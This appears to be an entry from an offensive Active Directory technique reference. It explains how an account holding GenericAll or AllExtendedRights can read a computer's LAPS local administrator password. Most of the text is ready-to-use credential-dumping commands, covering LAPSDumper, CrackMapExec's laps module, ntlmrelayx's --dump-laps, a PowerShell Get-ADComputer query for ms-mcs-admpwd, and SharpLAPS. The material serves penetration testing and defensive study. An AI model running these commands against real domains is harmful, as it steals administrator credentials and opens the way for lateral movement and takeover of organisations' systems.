This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).
From UNIX-like systems, LAPSDumper (Python) can be used to retrieve LAPS passwords. --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip
Alternatively, CrackMapExec also has this ability (since v5.1.6).. In case it doesn't work this public module for CrackMapExec could also be used.
# Default command
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.
This can be achieved with the Active Directory PowerShell module.
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
โ€‹SharpLAPS (C#) automates that process.
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:""
Copy link